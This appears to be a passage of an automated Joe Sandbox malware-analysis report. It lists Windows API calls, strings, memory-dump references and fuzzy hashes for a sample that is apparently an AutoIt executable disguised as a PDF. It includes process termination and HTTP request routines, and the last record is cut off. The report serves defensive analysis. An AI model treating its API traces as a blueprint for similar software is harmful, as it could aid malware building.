                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00367FB1
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00367FC4
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00367FD7
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00367FEA
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00367FFD
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00368010
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00368023
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00368036
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00368049
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0036805C
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0036806F
                                                    • __mtinitlocks.LIBCMT ref: 00367B4C
                                                      • Part of subcall function 00367E23: InitializeCriticalSectionAndSpinCount.KERNEL32(003FAC68,00000FA0,?,?,00367B51,00365E77,003F6C70,00000014), ref: 00367E41
                                                    • __mtterm.LIBCMT ref: 00367B55
                                                      • Part of subcall function 00367BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00367B5A,00365E77,003F6C70,00000014), ref: 00367D3F
                                                      • Part of subcall function 00367BBD: _free.LIBCMT ref: 00367D46
                                                      • Part of subcall function 00367BBD: DeleteCriticalSection.KERNEL32(003FAC68,?,?,00367B5A,00365E77,003F6C70,00000014), ref: 00367D68
                                                    • __calloc_crt.LIBCMT ref: 00367B7A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00367BA3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 2942034483-0
                                                    • Opcode ID: a0dbb8e25f55c901fc72e71586ba824f6ccc91545f77a38f7aa7b19ead3e39ed
                                                    • Instruction ID: 749b4f9549311b38d64db38eb8f98767f8878257c7b3470e738a119fa2c3f908
                                                    • Opcode Fuzzy Hash: a0dbb8e25f55c901fc72e71586ba824f6ccc91545f77a38f7aa7b19ead3e39ed
                                                    • Instruction Fuzzy Hash: 01F0F63211C71119E6277B347C0BA4A26D49F0177CFB1C699F874CE1DDFF2188418160
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0034281D
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00342825
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00342830
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0034283B
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00342843
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034284B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                                    • Instruction ID: 1f477a96a6675248c5c5114fe51b1dc9ff7d9e9e1e6656008233e13cb4c09c64
                                                    • Opcode Fuzzy Hash: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                                    • Instruction Fuzzy Hash: C70167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C87A42C7F5B864CBE5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 1423608774-0
                                                    • Opcode ID: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                                    • Instruction ID: 198deadfc95f0b73dc454a571002de4ffd4c9ae2c6a7aea46cfb8d7b300b7ba0
                                                    • Opcode Fuzzy Hash: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                                    • Instruction Fuzzy Hash: 91016236101311ABD71B3B64EC88EBB7769BF88701B09046AF503D6090DB68A801DB50
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00387C07
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00387C1D
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00387C2C
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C3B
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C45
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C4C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                                    • Instruction ID: 7402b2c631e80050901b9b5598cd48022b576b65c707389c0a4158567e5aca45
                                                    • Opcode Fuzzy Hash: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                                    • Instruction Fuzzy Hash: E7F05E76241158BBE7225B529C0EEEFBF7CEFC6B11F000068FA01D1151EBA06A41C7B5
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00389A33
                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A44
                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A51
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A5E
                                                      • Part of subcall function 003893D1: CloseHandle.KERNEL32(?,?,00389A6B,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 003893DB
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00389A71
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                                    • Instruction ID: 888a656e4762e63aa23637427b8c8d6dba5f537ee0bc72c27d7c183b3014058a
                                                    • Opcode Fuzzy Hash: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                                    • Instruction Fuzzy Hash: F5F05E36141211ABD7172BA4EC89EAA772DFF84301F190876F503D50A0DBB9A801DB50
                                                    APIs
                                                      • Part of subcall function 0035F4EA: std::exception::exception.LIBCMT ref: 0035F51E
                                                      • Part of subcall function 0035F4EA: __CxxThrowException@8.LIBCMT ref: 0035F533
                                                    • __swprintf.LIBCMT ref: 00341EA6
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00341D49
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 2125237772-557222456
                                                    • Opcode ID: 6d54e1843eeccd54e5ed42956583eb882827c4fa6ac375cbab7f2f38bf9a91b8
                                                    • Instruction ID: 27c6bfe44b53ac884f4e348dbd1aa4f6b032b87639554bc53eb5801be0ac984f
                                                    • Opcode Fuzzy Hash: 6d54e1843eeccd54e5ed42956583eb882827c4fa6ac375cbab7f2f38bf9a91b8
                                                    • Instruction Fuzzy Hash: 909169711142019FC726EF25C896CABB7E8EF85700F014929F9859F2A1DB60FE44CB92
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0039B006
                                                    • CharUpperBuffW.USER32(?,?), ref: 0039B115
                                                    • VariantClear.OLEAUT32(?), ref: 0039B298
                                                      • Part of subcall function 00389DC5: VariantInit.OLEAUT32(00000000), ref: 00389E05
                                                      • Part of subcall function 00389DC5: VariantCopy.OLEAUT32(?,?), ref: 00389E0E
                                                      • Part of subcall function 00389DC5: VariantClear.OLEAUT32(?), ref: 00389E1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                                    • Instruction ID: 01e8f49947b6efb1bfe7c709583ba47fa7f3009c7d72d66e56df4d3a07e6b68b
                                                    • Opcode Fuzzy Hash: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                                    • Instruction Fuzzy Hash: 49916A746083019FCB12DF24D58595BBBE8EF89704F04486EF89A9B362DB31ED05CB52
                                                    APIs
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                    • _memset.LIBCMT ref: 00385438
                                                    • GetMenuItemInfoW.USER32(?), ref: 00385467
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00385513
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0038553D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                                    • Instruction ID: fd8f8805d5e24b2d851a2dd86bf47f5fa601558f7d89966d576ea6a0ef310e29
                                                    • Opcode Fuzzy Hash: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                                    • Instruction Fuzzy Hash: 505102712047019BD717AF28C841BABBBE8AF86350F1506AAF896D71E0DBB0DD448B52
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003802B1
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003802C2
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00380344
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                                    • Instruction ID: 9ffe86564346fb34d576bd6a506658055ee4a4f7eec926631ce95dbc043f3fad
                                                    • Opcode Fuzzy Hash: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                                    • Instruction Fuzzy Hash: D8413C75600304EFDB8ADF64C885B9A7BA9EF44310B1580ADA909DF206D7F1DA48CBA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00385075
                                                    • GetMenuItemInfoW.USER32 ref: 00385091
                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003850D7
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401708,00000000), ref: 00385120
                                                    Strings
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                                    • Instruction ID: e94c8239dffc1bd2a3f2db5d14e32a9caa4ee41ad6e16f37d4dba5f370ec688d
                                                    • Opcode Fuzzy Hash: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                                    • Instruction Fuzzy Hash: C241F571204701AFDB22EF24DC84F2ABBE9AF85314F04469EF8559B391D730E904CB62
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 003A0587
                                                    Strings
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 2358735015-567219261
                                                    • Opcode ID: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                                    • Instruction ID: 66922b11276190e711b0bcd1b731ccf5836ed2d060b89ee14986d8719a9ed267
                                                    • Opcode Fuzzy Hash: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                                    • Instruction Fuzzy Hash: E531923091021AAFCF06EF54C8419EEB3B4FF56314B104629E866AB6E1DB71E915CB80
                                                    APIs
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0037B88E
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0037B8A1
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0037B8D1
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3850602802-1403004172
                                                    • Opcode ID: b70d8bd7858baa964c55c812d16e4a6634ea0a5d1f2854c32d56afc6489c87d7
                                                    • Instruction ID: 1685acd96d17723b135c38fd7fd72acc1a4291d3988349c0d73db05213e92761
                                                    • Opcode Fuzzy Hash: b70d8bd7858baa964c55c812d16e4a6634ea0a5d1f2854c32d56afc6489c87d7
                                                    • Instruction Fuzzy Hash: F521F671900108BFDB269B64D886EFEB7BCDF06350F108129F565AB1E0DB785D0A9760
                                                    APIs
                                                    • _memset.LIBCMT ref: 0034522F
                                                    • _wcscpy.LIBCMT ref: 00345283
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00345293
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003B3CB0
                                                    Strings
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 1053898822-1585850449
                                                    • Opcode ID: 6515272eced91e188436b917eb856cd404aecf9bcd9b44eb436f7e224018e9c2
                                                    • Instruction ID: 4ce7a2ffc5b10728cf9f00f109d9a9511545c1d086971db48a7ec0670739cd50
                                                    • Opcode Fuzzy Hash: 6515272eced91e188436b917eb856cd404aecf9bcd9b44eb436f7e224018e9c2
                                                    • Instruction Fuzzy Hash: 7F31A1718087446FD726EB60DC42FDE77DCAB45310F00492EF5859E4A2EB74B648CB96
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00394427
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00394457
                                                    • InternetCloseHandle.WININET(00000000), ref: 0039449E
                                                      • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                                    Strings
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 1951874230-3916222277
                                                    • Opcode ID: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                                    • Instruction ID: 56628d566580987b3286291d56a1ddea5114e0dabbf85f5ca49c438e74d8545a
                                                    • Opcode Fuzzy Hash: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                                    • Instruction Fuzzy Hash: E6219FB2500208BFEB139F55CC85EBFB6FCEB48B48F11802AF509E6240EA749D069771
                                                    APIs
                                                      • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                      • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                      • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003A915C
                                                    • LoadLibraryW.KERNEL32(?), ref: 003A9163
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003A9178
                                                    • DestroyWindow.USER32(?), ref: 003A9180
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                                    • Instruction ID: c36df3370eec123d1add2d2f1523054229c21b743e25463236ef8793aca35a8a
                                                    • Opcode Fuzzy Hash: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                                    • Instruction Fuzzy Hash: AA21A171200206BBEF224F64DC84FBB37ADEF9A364F11462AF954E6190C735DC52A760
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00389588
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003895B9
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 003895CB
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00389605
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                                    • Instruction ID: 3810732b695f9c1af9bbca2ae109d9c6f4500277782ab3c387fede9884c2104e
                                                    • Opcode Fuzzy Hash: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                                    • Instruction Fuzzy Hash: 1C215170600305ABDB22AF65DC05FAE77E8AF46724F244A6AF9A1D72D0D770E944CB10
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00389653
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00389683
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00389694
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003896CE
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                                    • Instruction ID: 60905a4f2a1b963e4bb784ddee4f7790b56d9c9ebbf04ade834b8298cf796abf
                                                    • Opcode Fuzzy Hash: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                                    • Instruction Fuzzy Hash: 562183716003059BDB22AF699C45FAAB7ECAF45730F280A5AF8A1E72D0F770D841CB50
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038DB0A
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0038DB5E
                                                    • __swprintf.LIBCMT ref: 0038DB77
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,003DDC00), ref: 0038DBB5
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                                    • Instruction ID: 36b5f9bd0677c5deaaac1661082ce4194540701130894f65273e3e4aab91f4a8
                                                    • Opcode Fuzzy Hash: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                                    • Instruction Fuzzy Hash: 5C215335A00208AFCB12EF65D985DEEBBF8EF49704B1440A9F509DB251DB71EA41CB61
                                                    APIs
                                                      • Part of subcall function 0037C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                                      • Part of subcall function 0037C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                                      • Part of subcall function 0037C82D: GetCurrentThreadId.KERNEL32 ref: 0037C864
                                                      • Part of subcall function 0037C82D: AttachThreadInput.USER32(00000000), ref: 0037C86B
                                                    • GetFocus.USER32 ref: 0037CA05
                                                      • Part of subcall function 0037C876: GetParent.USER32(?), ref: 0037C884
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037CA4E
                                                    • EnumChildWindows.USER32(?,0037CAC4), ref: 0037CA76
                                                    • __swprintf.LIBCMT ref: 0037CA90
                                                    Strings
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                    • String ID: %s%d
                                                    • API String ID: 3187004680-1110647743
                                                    • Opcode ID: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                                    • Instruction ID: da71f5ecd25b613e6ec3d3d06ec88c97ce869ce89ebf99ac9adfb291cf325d7b
                                                    • Opcode Fuzzy Hash: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                                    • Instruction Fuzzy Hash: D31175715102057BCB23BF509C86FE9376C9F45714F00906AFE0CAE142DB74A546DB71
                                                    APIs
                                                    • __lock.LIBCMT ref: 00367AD8
                                                      • Part of subcall function 00367CF4: __mtinitlocknum.LIBCMT ref: 00367D06
                                                      • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                                    • InterlockedIncrement.KERNEL32(?), ref: 00367AE5
                                                    • __lock.LIBCMT ref: 00367AF9
                                                    • ___addlocaleref.LIBCMT ref: 00367B17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
